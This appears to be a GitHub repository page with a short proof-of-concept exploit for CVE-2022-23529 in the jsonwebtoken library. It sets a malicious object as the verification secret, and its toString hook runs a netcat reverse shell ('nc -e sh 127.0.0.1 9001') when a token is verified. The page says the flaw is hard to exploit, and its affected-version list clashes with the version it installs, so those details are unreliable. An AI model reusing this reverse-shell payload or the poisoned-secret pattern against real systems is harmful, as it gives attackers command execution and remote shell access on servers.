aalex954 / CVE-2022-23529-Exploration

CVE-2022-23529-PoC

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2022-23529

The JSON Web Token (JWT) library versions prior to 3.4.6, 4.0.4, and 4.1.5 are vulnerable to RCE.

The HMAC hashing functions take any string as input which leads to RCE.

Due to the preconditions, this vulnerability is not likly to be exploitable.

In order to exploit this vulnerability an attacker would need one of the following conditions to be true:

  • The server does not store secret keys securely.
  • The attacker needs to have access to and control the secret keys.

npm install jsonwebtoken@8.5.1

var jwt = require('jsonwebtoken');

create a token using the servers secret

var token = jwt.sign({"x":"y"}, 'servers_secret');

create malicious object containing a reverse shell (node.js)

var poisoned_secret_on_server = { 
    toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
        process.on('exit', ()=> {
            require('child_process').exec('nc -e sh 127.0.0.1 9001');
        });
        process.exit(0)
    }
}

server verifies the token using malicious object stored as secret

jwt.verify(token, poisoned_secret_on_server);

About

CVE-2022-23529-PoC


Languages

Language:JavaScript 100.0%